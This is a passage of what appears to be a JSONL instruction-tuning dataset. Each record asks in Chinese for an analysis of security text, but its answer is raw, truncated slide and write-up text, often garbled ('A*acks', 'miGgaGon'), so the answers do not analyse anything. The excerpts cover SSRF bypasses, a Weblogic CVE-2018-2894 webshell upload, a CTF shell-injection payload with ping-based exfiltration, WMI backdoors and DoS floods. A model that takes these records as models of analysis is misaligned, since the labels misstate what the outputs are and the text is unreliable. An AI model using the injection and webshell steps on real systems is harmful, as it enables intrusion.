tuneChannel() { System.out.println(\"Con", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 一定义 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞一般情况下SSRF攻击的目标是从外网无法访问的内部系统正是因为它是由服务端发起的所以它能够请求到与它相连而与外网隔离的内部系统 SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制比如从指定URL地址获取网页文本内容加载指定地址的图片下载等等注意除了http/https等方式可以造成ssrf类似tcp connect 方式也可以探测内网一些ip 的端口是否开发服务只不过危害比较小而已 ## 二SSRF 漏洞的寻找 ### SSRF寻找方式----WEB功能上寻找 1. 分享通过url 地址分享网页内容 http://share.v.t.qq.com/index.php?c=share&a=index&title=&url=http://www.baidu.com 通过目标URL地址获取了title标签和相关文本内容而如果在此功能中没有对目标地址的范围做过滤与限制则就存在着SSRF漏洞 2. 转码服务通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览 由于手机屏幕大小的关系直接浏览网页内容的时候会造成许多不便因此有些公司提供了转码功能把网页内容通过相关手段转为适合手机屏幕浏览的样式例如百度腾讯搜狗等公司都有提供在线转码服务 3. 在线翻译通过URL地址翻译对应文本的内容例如有道词典UCQQ浏览器等 http://b2.wap.soso.com/sweb/detail.jsp?icfa=1327068&sid=AaEj1UgdrgdWthTwdJnvPeTI&g_ut=2&url=http://admin.soso.com 4. 图片加载与下载通过URL地址加载或下载图片 http://read.html5.qq.com/image?imageUrl=http://10.156.52.13/favicon.ico http://img.store.sogou.com/net/a/08/link?appid=100520033&url=http://10.12.139.10/favicon.ico 图片加载远程图片地址此功能用到的地方很多但大多都是比较隐秘比如在有些公司中的加载自家图片服务器上的图片用于展示此处可能会有人有疑问为什么加载图片服务器上的图片也会有问题直接使用img标签不就好了 没错是这样但是开发者为了有更好的用户体验通常对图片做些微小调整例如加水印压缩等所以就可能造成SSRF问题  5. 图片文章收藏功能 此处的图片文章收藏中的文章收藏就类似于功能一分享功能中获取URL地址中title以及文本的内容作为显示目的还是为了更好的用户体验而图片收藏就类似于功能四图片加载 6. 未公开的api实现以及其他扩展调用URL的功能 此处类似的功能有360提供的网站评分以及有些网站通过api获取远程地址xml文件来加载内容 http://visopen.vipshop.com/doc/sdk/php/aj_interface.php?api_name=e&api_url=http://内网WEB路径&callback=jQuery191011010590475052595_1432854159288&o=json&_=1432854159289 ### SSRF寻找方式----URL关键字中寻找 关键字sharewapurllinksrcsourcetargetu3gdisplaysourceURlimageURLdomain 利用google 语法加上这些关键字去寻找SSRF漏洞 http://share.renren.com/share/buttonshare.do?link=http://t.cn/RwbLKDx http://qing.blog.sina.com.cn/blog/controllers/share.php?url=10.210.75.3  ## 三SSRF 验证方式 1. 用抓包工具看请求由客户端发起还是服务端发起漏洞如果不是客户端发出的请求则有可能是接着找存在HTTP服务的内网地址 --从漏洞平台中的历史漏洞寻找泄漏的存在web应用内网地址 --通过二级域名暴力猜解工具模糊猜测内网地址 3. 直接返回的Bannertitlecontent等信息 3. 利用file协议 读取本地文件等 4. bool型SSRF 5. 关于盲打ssrf的用例可以在盲打后台用例中将当前准备请求的uri 和参数编码成base64这样盲打后台解码后就知道是哪台机器哪个cgi触发的请求 ## 四SSRF 绕过方式 1http://ww", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Global Economy with GPUs or How I Learned to Stop Worrying and Love Bitcoin By Skunkworks -First time DEFCON speaker and attendee -Electrical Engineering Undergrad at a Major University -Hardware Geek with diverse interests -Not affiliated with Lockheed-Martin! -Not affiliated with Bitcoin! -Basic introduction with in-depth portion -This talk may have been updated! WHY was Bitcoin created?  High fees with current e-payment solutions  Paypal (and others) playing big brother  Increase in decentralized digital technologies, eg torrents WHAT is Bitcoin and WHO made it?  A decentralized Peer-to-Peer currency  No central authority  Transactions verified by peers  Over $100,000,000 US in value  Money printed by GPUs  Enigmatic developer Satoshi Nakamoto who left in 2010 The Economics of Bitcoin Hackers? In my Economy? It's more likely than you think!  Bitcoin is Fiat currency, just like USD  It has built in deflation, never more than 21,000,000 BTC  Can be traded down to 0.00000001BTC  Generated by GPUs (or ASICs?), backed by the marginal utility of a Semi-Anonymous virtual currency  Not a Ponzi Scheme, but the early adopters got rich  Price up over 200,000%, rampant speculation due to media coverage and novelty of currency type  Will likely find an equilibrium price due to many factors A chart is fine too...  $0.06 to $30 in a few months, this scale is logarithmic!  Who made big bucks? SHA-256, the block chain and GPUs  Bitcoin algorithm based on SHA-256  GPUs are hundreds of times faster than CPUs  Every transaction is hashed and becomes part of the block chain  Coins stored in a wallet.dat file  The entire network is many times more powerful than folding@home or the RIEKN supercomputer  Mining pooled to a large degree, fees are making top pool operators rich Attack Vector: Botnets and Bitcoin  These attacks rely on overwhelming the network with illegitimate clients or a lot of hashing power  Forking the block chain if you control over 50% of the net- work ha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n### 现实世界中常用的编码 现实世界中常用的编码包括条形码二维码等编码形式 ### 条形码介绍 - 宽度不等的多个黑条和空白按照一定的编码规则排列用以表达一组信息的图形标识符 - 国际标准 - EAN-13 商品标准13 位数字 - Code-3939 字符 - Code-128128 字符 - [条形码在线识别](https://online-barcode-reader.inliteresearch.com/) ### 二维码介绍 - 用某种特定几何图形按一定规律在平面分步的黑白相间的图形记录数据符号信息 - 堆叠式 / 行排式二维码Code 16 kCode 49PDF417 - 矩阵式二维码QR CODE", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPE格式详解 概述 PE文件的全称为Portable Executable是windows操作系统下可执行文件的一种文件格式符合 COFF标准(Common Object File Format:https://en.wikipedia.org/wiki/COFF)除了我们常见的exe文 件像windows下的动态链接库文件(.dll)内核驱动(.srv)控制面板文件(.cpl)等都属于PE文件 PE文件是一种数据结构里面包含了OS加载程序能够把它加载到内存中并运行的所需的信息 结构预览 一个典型的PE结构如下图所示 如果使用PEbear(https://github.com/hasherezade/pe-bear-releases)打开一个可执行文件我们能 够看到相同的结构 DOS Header 每个PE文件都以一个64字节的结构开头称为DOS Header它使得PE文件成为windows下的可执行 文件 DOS Stub 在DOS Header之后便是DOS Stub它是一个小的MS-DOS 2.0下面的可执行文件当文件以DOS模 式运行时会打印一串错误信息This program cannot be run in DOS mode NT Headers NT Header主要有下面几个部分组成 PE signature  将文件标识为PE文件的一个四字节的签名 File Header标准COFF头里面包含了一些有关PE文件的信息 Optional Header: NT Header中最重要的部分该头为系统加载提供信息 Section Table 跟在NT Header之后其为一个数组PE 文件中的每个节都有一个节标题每个标题都包含有关它所 引用的部分的信息 Sections 节是存储文件实际内容的地方包括程序使用的数据和资源等内容以及程序的实际代码有几个 节每个节都有自己的用途 下面是每个部分的详细介绍 DOS Header 结构 如前文所说其为一个64字节长度的结构其定义在winnt.h中名为IMAGE_DOS_HEADER 下面是一些比较重要部分的介绍 e_magic 它是DOS Header的第一个成员数据类型为WORD所以占2字节其拥有一个固定 的ASCII值0x5A4D或MZ其作用为将文件标识为可执行文件 e_lfanew它是DOS Header的最后一个成员位于DOS头的0x3c偏移处它保存了到NT Header的偏移量它告诉加载器去哪里寻找文件头 在PEbear下显示如下 typedef struct _IMAGE_DOS_HEADER { // DOS .EXE header WORD e_magic; // Magic number WORD e_cblp; // Bytes on last page of file WORD e_cp; // Pages in file WORD e_crlc; // Relocations WORD e_cparhdr; // Size of header in paragraphs WORD e_minalloc; // Minimum extra paragraphs needed WORD e_maxalloc; // Maximum extra paragraphs needed WORD e_ss; // Initial (relative) SS value WORD e_sp; // Initial SP value WORD e_csum; // Checksum WORD e_ip; // Initial IP value WORD e_cs; // Initial (relative) CS value WORD e_lfarlc; // File address of relocation table WORD e_ovno; // Overlay number WORD e_res[4]; // Reserved words WORD e_oemid; // OEM identifier (for e_oeminfo) WORD e_oeminfo; // OEM information; e_oemid specific WORD e_res2[10]; // Reserved words LONG e_lfanew; // File address of new exe header } IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER; 最后一个位置的成员的值为100100处就是NT Header的初始位置 DOS Stub 由上文可知该部分并无实际意义提取后如下 保存为exe文件使用IDA打开显示如下 0E 1", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--send-ip  -Pn -sn --disable-arp-ping --send-ip nmap- 0x00 -sL 0x01 -sn(-sP) 0x02 -Pn -PS22,80,113 -PS22-50 -PS -PA ping -M time ping -M mask 0x03 -PS 0x04 -PA 0x05 -PU 0x06 -PY 0x07 -PE; -PP; -PM (ICMP Ping Types)     0x08 -PO 0x09 0x10", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDiscover Flash Player Zero-day A4acks In The Wild From Big Data Peter Pi @heisecode Agenda  Who am I  Background  Discover flash 0-day a4acks from big set samples  Vector Length miGgaGon About me  Security researcher  APT product developer  Interested in discovering vulnerabiliGes and wriGng exploit.  Focus on Flash and Android recently. WAR3 & Ping Pong Hobbyist Found CVE-2015-0313 flash 0-day a4ack CVE-2015-5122 & 5123 from hacked team Found some newly patched flash a4ack My Blog address  h4p://blog.trendmicro.com/trendlabs- security-intelligence/author/peterpi/  Will publish some Android bugs I found. Agenda  Who am I  Background  Discover flash 0-day a4acks from big set samples  Vector Length miGgaGon Flash Year  Because of browsers UAF miGgaGons and JAVA pop-up window, Flash Player became the weakest out of popular targets in PC. Flash Year  Finally, we can see that Zero-day a4acks targets are mostly Flash Player in 2015 > CVE-2015-0310 > CVE-2015-0311 > CVE-2015-0313 > CVE-2015-3043 > CVE-2015-3113 > CVE-2015-5119 > CVE-2015-5122 Flash Year  Newly patched N-day a4acks in Exploit Kits this year almost are based on Flash Player vulnerabiliGes. > CVE-2014-8439 > CVE-2014-9163 & CVE-2014-9162 > CVE-2015-0336 > CVE-2015-0359 > CVE-2015-3090 . . Flash Year  In this situaGon, I wanted to disclose Flash 0- day a4acks when tried to guess future perspecGve in late 2014.  Disclose newly patched n-day a4acks also has value to users. Background  Got tens of millions of suspicious SWFs in our Hadoop server, and thousands newly added every day.  I think this is a good resource to find 0-day a4acks  So, this topic Gtles big data is a trick, and not related to data mining or machine learning J Agenda  Who am I  Background  Discover flash 0-day a4acks from big set samples  Vector Length miGgaGon Problem I face  Big set samples to handle.  I need a automaGon process.  It can achieve very low False Alert rate, fast processing speed.  Final manual check only needs handle li4le Flash sam", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBe your own telephone company... ...with Asterisk! Presented by Strom Carlson and Black Ratchet DEFCON 13 July 2005 Brief history of telephone switching  Manual cordboards  Labor-intensive  Step / Panel / Crossbar  Electromechanical  Simple and effective, but limited in function  Expensive to maintain  No. 1 / 1AESS  Electronically-controlled analog switching  Much wider array of services available  More flexibility than electromechanical switches  Some still in use today in North America Brief history of telephone switching  4 ESS / 5 ESS / DMS  Digital time-division switching  Greatly increased flexibility and array of services  Much cheaper to maintain than previous systems  Huge and expensive Part I: Asterisk Overview (or... what the &$#%@ is this thing?) What is Asterisk?  Free, open-source PBX that runs on Linux  Best thing since sliced bread  Originally written by Mark Spencer  Now has a large number of contributors Why Asterisk?  It's FREEEEEEEEEEEEEEEEEEEE!!!!!!!  How much are you paying your PBX vendor now?  Runs on commodity PC hardware  Broad support for VoIP protocols and hardware  Easy to interconnect with other boxes  Form your own VoIP network  Configurable to do (almost) whatever you want  Tweak it to your needs  Write your own code  It will still not do your dishes, unfortunately Asterisk and Hardware Asterisk Hardware Requirements  Will run on surprisingly out-of-date hardware  133MHz Pentium I w/16MB RAM  supports 3 concurrent SIP calls before quality degrades  Any PC you have lying around will work  2.4 GHz P4 w/512 MB RAM  790 simultaneous calls http://www.voip-info.org/wiki-Asterisk+dimensioning Sample Asterisk Installation Asterisk Web Mail Catsex NAS Asterisk Console Popular VoIP Telephones Cisco 7960 $250-$300 Polycom IP600 $250-$300 Grandstream BudgeTone 100 $40-$75 Snom 190 $175-$250 Popular VoIP Terminal Adapters Digium IAXy $100 Sipura SPA-2002 $70 Grandstream HandyTone 286 $65 Cisco ATA-186 $50-$125 Digium Zaptel Cards  TDM400P  Connec", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking the Mind: NLP and Influence by Mystic Goals for Talk Introduction to NLP Tools for using NLP to influence Gaining rapport Motivation strategies Submodalities Milton Model What is NLP? Neuro-Linguistic Programming Neuro: Our neurology and our five senses Linguistic: The language we use to describe our word and communicate with others Programming: The habitual and often sequential nature of our thoughts, feelings, and actions History of NLP Richard Bandler and John Grinder (1970s) Studied successful therapists (Fritz Perls, Virginia Satir, etc..) Observed patterns in their behaviors The Structure of Magic I and II Meta-Model History of NLP Met Dr. Milton H. Erickson Master of indirect hypnosis The Milton Model Proof that powerful skills can be duplicated History of NLP Presuppositions of NLP The map is not the territory Experience has a structure The mind and body are parts of the same system If one person can do something, anyone can learn to do it People already have all the resources they need You cannot NOT communicate The meaning of your communication is the response you get Underlying every behavior is a positive intention People are always making the best choice(s) available to them If what you are doing isn't working, do something else. Do anything else. Building Physical Rapport Mirroring and Matching Body position, posture, movement, rhythm, breathing Voice tone, speed, volume, rhythm Do not mimic Building Verbal Rapport Representational systems Visual, auditory, kinesthetic, olfactory (smell), gustatory (taste) People usualy prefer or lead with one or two Building Verbal Rapport Predicates Everything after and including the verb of a sentence Can help to determine the representational system being used Example: I can see what youre saying clearly Communicating with someone using the same rep. system they are using can help to gain rapport Visual Phrases: I see what you mean We see eye to eye The future looks Bright Auditory Phrases Loud and clear Unhea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWMI 重写版 本文是以WMI的重写版本来这份笔记会更长原版的笔记以 Black Hat 2015的 Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asyncronous, and Fileless Backdoor为主要学习资料在笔记写到大概一万字的时候Typora 中保存的内容部分丢失 于是重新整理有了这份我认为精简版的WMI 笔记 WMI 背景 WMI 是什么Windows管理规范WMI是Microsoft对基于Web的业务管理标准WBEM公共信 息模型CIM和分布式管理任务组DMTF的实现 换句话说 Microsoft + CIM + WBEM +DMTF = WMI 打开MSDN 中关于WMI 的描述是这样 Windows Management Instrumentation (WMI) is the infrastructure for management data and operations on Windows-based operating systems Windows管理工具WMI是基于Windows操作系统的管理数据和操作的基础设施 快速的过一下这部分内容的重点 WMI 实际上的历史非常久远最早在Windows 2000中内置后面所有的Windows 系统中都内置 了该项服务 WMI使用 公共信息模型 (CIM) 表示托管组件其中包括 系统应用程序网络等等 CIM 中使用 Class\"(类)表示管理对象类的实例是 Object名称空间Namespace是一个类 的集合类包含属性Property和方法Method) WMI 支持 Schema 的概念Schema 是描述特定管理环境的一组类Microsoft Windows SDK 中 使用了两个 Schema : CIM Schema 和 Win 32 Schema CIM Schema Class 使用 \"CIM_\" 开头 Win32 Schema Class 使用 \"Win32_\" 开头 和WMI交互 在开始WMI之前我建议 WmiExplorer 查看 自己机器上的 NamespacesClassProperty Method等等对我说的概念有一个简单的了解复杂你可能会看着很懵 为了验证上面我描述的一些内容我建议WmiExplorer 进行查看 可以注意到前面描述中的 NamespaceClassPropertiesMethods 实际上和WMI交互有多种方法 Powershell wmic.exe wbemtest.exe winrm.exe and winrm.vbs WMI Explorer WMI Explorer 2.0.0.2 WMI Explorer WMI Tools CIM Explorer 2020(收费但是非常强大对类进行了中文说明VBscriptpowershell 代 码简洁推荐) Windows Script Host LanguagesVBScript  JScript IWbem* COM API .NET System.Management classes Linuxwmic and wmis 另外两个小工具 WMI Code Creator 这是微软官方出的一款代码生成器可生成C#VB .net VB Script代码 WMIGen 可生成各种变成语言调用WMI 除了IWbem* COM API和.NET System.Management classes没有试过其余的工具均有测试推 荐使用WMI Explorer GUI界面非常好用 WMI Query Language (WQL) 参考 Querying with WQL WQL (SQL for WMI) WMI 查询语言WQL是ANSI SQL 的子集WQL支持以下的查询: Data queries Event queries Schema queries 详细的语法请参考文档这里不做过多介绍用的最多的是 data queries 请在实际查询中使用需 要明确的是WQL仅能查询无法使用 Methods 进行增删改等操作 Remote WMI Protocols WMI 可以使用两种协议用于 Remote WMI:分布式组件对象模型 (DCOM) 和 Windows 远程管理 (WinRM) DCOM Microsoft 在TCP 135 端口和一系列的动态端口不同版本不一样 运行DCE RPC end-point mapper为它的DCOM服务 端口可通过注册表项 HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Rpc\\Inte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Brainers To Hire * Category: Web * 100 points ## Description > Layoffs are worldwide, but we're strong, have terrific customers, and have lots of money. > > So if you are unsatisfied with what you do, or you just like to be a millionaire upload your resume! ## Solution Didn't solve this one during the CTF, got the intended solution from the admin (). A website was attached. The interesting part was: ```html <div class=\"container\"> <h1 class=\"banner_taital\">Adventure</h1> <p class=\"banner_text\"> Layoffs are worldwide, but we're strong, have terrific customers, and have lots of money.So if you are unsatisfied with what you do, every company meeting is a slippery slope.If your colleagues are not your cup of tea, or you just like to be a millionaire zip it and join us! </p> <form id=\"upload_form\" name=\"upload_form\" method=\"post\" enctype=\"multipart/form-data\"> <div class=\"read_bt\"> <input type=\"file\" name=\"uploaded_file\" onchange=\"handle_file()\" placeholder=\"resume..\" id=\"uploaded_file\"> </div> </form> <p class=\"banner_text\" id=\"upload_status\"></p> </div> ``` What we have here is a form to upload a file, and a clear hint towards `zip` files. In addition, we have: ```javascript var form = document.getElementById(\"upload_form\"); function handle_file() { var status = document.getElementById(\"upload_status\"); var data = new FormData(form); fetch(form.action, { method: form.method, body: data, headers: { 'Accept': 'application/json' } }).then(response => { response.json() .then((data)=>{ if (data.flag) status.innerHTML = data.flag; else status.innerHTML = \"Thanks for your submission!\" ; form.reset() }) }).catch(error => { status.innerHTML = \"Oops! There was a problem submitting your form\" }); return false; } ``` We can see that if we trigger the flow on the server side to reveal the flag, we'll get it back in the response to the form upload. For standard uploads, we get: ```console (user@kali)-[/media//2/3/4/5] $ curl -F \"uploaded_file=@test.zip\" 'https://brainerstohire.app", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCatching DNS tunnels with Catching DNS tunnels with IDS that doesnt suck A.I. IDS that doesnt suck A.I. A talk about Artificial Intelligence, A talk about Artificial Intelligence, geometry and malicious network geometry and malicious network traffic. traffic. Agenda Agenda Introduction Introduction Neural Network basics Neural Network basics DNS Tunnel Basics DNS Tunnel Basics Data mining DNS tunnels out of Data mining DNS tunnels out of network traffic with a Neural network traffic with a Neural Network. Network. Destination unknown Destination unknown Introduction Introduction The goal of the project was to The goal of the project was to reliably discover DNS tunnels out of reliably discover DNS tunnels out of network traffic. network traffic. Hopefully, youll learn a lot from it. If Hopefully, youll learn a lot from it. If nothing else, maybe it will inspire nothing else, maybe it will inspire someone to do something someone to do something interesting. interesting. A.I. A.I. When I say A.I., most people start When I say A.I., most people start thinking of a computer with thinking of a computer with personality or traits, movie or book personality or traits, movie or book computer characters, replacing their computer characters, replacing their spouse with a robot etc. spouse with a robot etc. Not really what *I* am talking about Not really what *I* am talking about when I say AI. How about a program when I say AI. How about a program that gets a computer to make a that gets a computer to make a difficult distinction or decision. difficult distinction or decision. Classification Classification Classification is one such distinction Classification is one such distinction or decision. or decision. So, lets get a more clear discussion So, lets get a more clear discussion of AI by talking about how we think. of AI by talking about how we think. Or how we think we think, we think. Or how we think we think, we think. Ugh. Ugh. Which is the apple, orange and Which is th", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Weblogic 任意文件上传漏洞CVE-2018-2894 Oracle 7月更新中修复了Weblogic Web Service Test Page中一处任意文件上传漏洞Web Service Test Page 在生产模式下默认不开启所以该漏洞有一定限制 利用该漏洞可以上传任意jsp文件进而获取服务器权限 参考链接 - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html - https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ - https://xz.aliyun.com/t/2458 ## 漏洞环境 执行如下命令启动weblogic 12.2.1.3 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:7001/console`即可看到后台登录页面 执行`docker compose logs | grep password`可查看管理员密码管理员用户名为`weblogic` 登录后台页面点击`base_domain`的配置在高级中开启启用 Web 服务测试页选项 ![](img/1.png) ## 漏洞复现 访问`http://your-ip:7001/ws_utc/config.do`设置Work Home Dir为`/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css`我将目录设置为`ws_utc`应用的静态文件css目录访问这个目录是无需权限的这一点很重要 ![](img/2.png) 然后点击安全 -> 增加然后上传webshell ![](img/3.png) 上传后查看返回的数据包其中有时间戳 ![](img/4.png) 然后访问`http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]`即可执行webshell ![](img/5.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Physical Security Beyond Dumpster Diving and Social Engineering or, Screw the Firewall and the Secretary Too Eric Schmiedl security.ericschmiedl.com We Want Information Information Information  You wont get it. By hook or by crook, we will  The Prisoner (1967) \"Many of Russia's wealthiest banks and corporate tycoons have set up their own private security agencies, usually staffed with former KGB officers. Their task is to spy on their political and business enemies and to gather compromising material... ...the former KGB has fragmented into a multitude of private agencies that exploit their secret-police expertise for personal profit.\" Geoffrey York, The Globe and Mail, 7/8/00 \"[US officials] say a record 108 nations were involved in trying to steal sensitive US technologies in 2005, the last year for which full data was available.\" James Kitfield, Air Force Magazine, March 2007 Blurring the line between industrial and government espionage Hacking for exploration -> Hacking to steal money/information Clever exploitation of technology -> Whatever gets the goods Computer crime as a business Weve seen an explosion of computer crime in the past few years, and Im not talking about people hacking the NSA so they listen in on Karl Roves cell phone. I mean the flourishing industry in stolen credit card numbers. I mean people in Who-Knows-Where-istan using their botnets to wipe companies off the Web if they dont pay protection money. And above all, I mean identity theft -- people taking out lines of credit using stolen financial information. The thing is, Ivan P. Malwarovski doesnt care about how he gets the information he needs to take people to the cleaners. It doesnt matter to him whether he pulled off a great end-run around the IDS or whether he paid his buddy the ex-KGB agent to break into their office and plant a laptop in the dropped ceiling. Ivan makes his money no matter what. And what if he isnt in the identity theft business? Maybe he knows a Romanian commod", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nQuantum Classification of Malware John Seymour (seymour1@umbc.edu) 2015-08-09 whoami  Ph.D. student at the University of Maryland, Baltimore County (UMBC)  Actively studying/researching infosec for about three years (mostly academic)  Currently work for CyberPoint International Outline  D-Wave Basics  The D-Wave Controversy  How to play around on a D-Wave  Some Machine Learning Background  Building a Quantum Malware Classifier https://blog.kaspersky.com/quantum-computers-and-the-end-of-security/ What you might have heard (and why its wrong)  FALSE: The D-Wave can solve NP-Complete problems in polynomial time.  PROBABLY FALSE: The current D-Wave chip is already better than classical computing for hard problems. The Current State of Affairs Quantum effects are happening but that might not be interesting We don't know whether the D-Wave uses quantum effects for computation. Regardless, it cannot run Shor's/Grovers/QKD. http://www.dwavesys.com/ http://www.nytimes.com/ http://www.nytimes.com/ http://www.dwavesys.com/ http://www.dwavesys.com/ http://www.dwavesys.com/ D-Wave chips consist of:  magnetized niobium loops  couplers http://www.dwavesys.com/ The D-Wave QUBO 𝑖 𝑎𝑖𝑞𝑖 + 𝑖,𝑖 𝑎𝑖𝑖𝑞𝑖𝑞𝑖 \"Quadratic Unconstrained Binary Optimization\" Input Output Theyve got a website. To do stuff on and stuff. System 6 System 13 One D-Wave Run Input Output Blackbox/QSage  Software, developed by D-Wave  Turns arbitrary problems into QUBOs  Heuristic-based (problem is NP-Complete)  Conversation between classical machine and D-Wave  Adds time from network latency Blackbox Python Code So what can D-Wave machines do? D-Wave claims applications: classification, protein-folding models, finding close-to- optimal solutions to NPC problems (e.g. Traveling Salesman) Crash Course in Machine Learning (At least whats relevant to this) Boosting - using combinations of weak classifiers  Consider 3 classifiers with 70% accuracy  Majority vote can increase your accuracy to 0.7838! (Hint: add up the top row)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## smartcat3 (web) This task was another web ping utility, similar to one from the teaser. We were able to submit a text, which would then be passed to `ping` command, like so: `ping -c 1 OUR_TEXT`. This asks for shell command injection - it was not that easy though, since server filtered most metacharacters, such as `$&|` and others. Some special characters were allowed though - in particular, `<>()`. Using those, and bash's so called \"process substitution\" (which we found in `man bash`), we were able to execute commands like `ping -c 1 <(ls)`. Note that this did not give us any output on the web interface - the server returned only whether the command succeeded or not. First problem we had to deal with, was filtering of spaces. With `$` disallowed too, we were not able to use `${IFS}` or similar constructs, but we could still redirect any text to any file, for example: ``` <(python<<<\"print'%c%c'%(108,115)\">/tmp/p4Rocks) ``` This command, when used in process substitution context, should create file `/tmp/p4Rocks` with `ls` in it (from ASCII codes). Later, we could simply execute this script using `<(python</tmp/p4Rocks)`. We automatized this workflow in `doit.py`. Right now, we were able to execute arbitrary command on the server, but we still did not have a way to read their output. The description of task, as we read it (as it turned out, incorrectly, making our work harder), told us that all the ports on the server are closed. One of the ways to bypass this, is to use `ping` with payload - builting `ping` command has a nice feature: `-p pattern` makes a `ping` probe with selected pattern. If we `ping` ourselves with pattern equal to output of the executed command, we are able to sniff it, and receive it. Sample output, as seen in Wireshark, of `ls -al` (first 16 bytes): ![Output](wireshark.png) You can clearly see `-rw-r----- 1 roo`, meaning that the first file was owned by root and had `-rw-r-----` permissions. Trying the usual stuff, such as `ls -al /`, we f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvil DoS A*acks and Strong Defenses Sam Bowne and Ma*hew Prince DEF CON 21 August 2, 2013 Bio Bio Evil A*acks Sockstress New IPv6 RA Flood Sockstress TCP Handshake Images from drawingstep.com and us.123rf.com Client Server TCP Window Size 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Source Port | Destination Port | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Acknowledgment Number | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Data | |U|A|P|R|S|F| | | Offset| Reserved |R|C|S|S|Y|I| Window | | | |G|K|H|T|N|N| | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Checksum | Urgent Pointer | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Options | Padding | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | data | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ TCP Header Format Sockstress A*ack Images from drawingstep.com and us.123rf.com Client Server From 2008  SPll not patched  A*acks TCP by sending a small WINDOW size  Causes sessions to hang up, consuming RAM  Can render servers unbootable Sockstress Demo MiPgaPon  Short-term  Block packets with small window sizes with a firewall  Long-term  PATCH OS to reclaim RAM  Its been 5 years, guys! IPv4 ExhausPon IPv4 ExhausPon One Year Le\\ IPv6 ExhausPon Link-Local DoS IPv6 Router AdverPsements Old A*ack (from 2011) Image from forumlane.org IPv4: DHCP PULL process n Client requests an IP n Router provides one Host Router I need an IP Use this IP IPv6: Router AdverPsements PUSH process n Router announces its presence n Every client on the LAN creates an address and joins the network Host Router JOIN MY NETWORK Yes, SIR Router AdverPsement Packet RA Flood (from 2011) flood_router6 Effects of flood_router6  Drives Windows to 100% CPU ", "category": "text_analysis", "source": "security_papers"}
